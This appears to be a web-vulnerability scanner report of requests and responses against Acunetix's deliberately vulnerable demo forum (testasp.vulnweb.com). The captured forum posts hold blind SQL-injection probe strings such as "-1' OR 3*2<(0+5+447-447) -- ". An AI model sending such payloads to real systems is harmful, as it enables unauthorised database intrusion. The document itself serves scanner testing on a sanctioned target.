Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:21 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=74 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+447-447) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=75 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+447-447) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=76 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=77 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=78 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4163 |
Response Body - size: 4,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=79 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4163 |
Response Body - size: 4,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
